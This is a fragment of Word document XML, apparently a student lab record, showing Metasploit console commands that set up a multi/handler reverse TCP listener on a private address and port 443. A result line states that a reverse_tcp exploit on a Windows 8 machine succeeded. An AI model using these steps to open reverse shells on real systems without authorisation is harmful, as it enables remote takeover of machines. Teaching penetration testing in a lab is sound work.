        <w:t xml:space="preserve">msf5 exploit(multi/handler) &gt; set LHOST 172.16.8.155 LHOST =&gt; 172.16.8.156 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77915B02" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115" w:right="3769"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf5 exploit(multi/handler) &gt; set LPORT 443 LPORT =&gt; 443 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D59AF" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf5 exploit(multi/handler) &gt; exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E464F16" w14:textId="77777777" w:rsidR="00C309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54E7E4" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 172.16.8.155:443 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5650FB0E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BBC3122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7DB5D883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44020D6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B388655" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="8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2866DDA" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="38"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A313184" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="115"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C456F64" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="105" w:firstLine="716"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thus, the setup of Metasploit framework and exploit reverse_tcp in Windows 8 machine remotely has been executed successfully. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C3094F">
      <w:pgSz w:w="11899" w:h="16862"/>
      <w:pgMar w:top="1428" w:right="1480" w:bottom="147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33AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4A6598A"/>
    <w:lvl w:ilvl="0" w:tplc="84567800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208BC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EFE4E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207CE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41C3E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21E04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2224C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5ECE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EFC50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86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94F"/>
    <w:rsid w:val="00181BFA"/>
    <w:rsid w:val="003C3202"/>
    <w:rsid w:val="00C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DC4A"/>
  <w15:docId w15:val="{3D9313E8-46D6-496A-9F64-6C4548A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2024-11-20T02:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-20T02:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>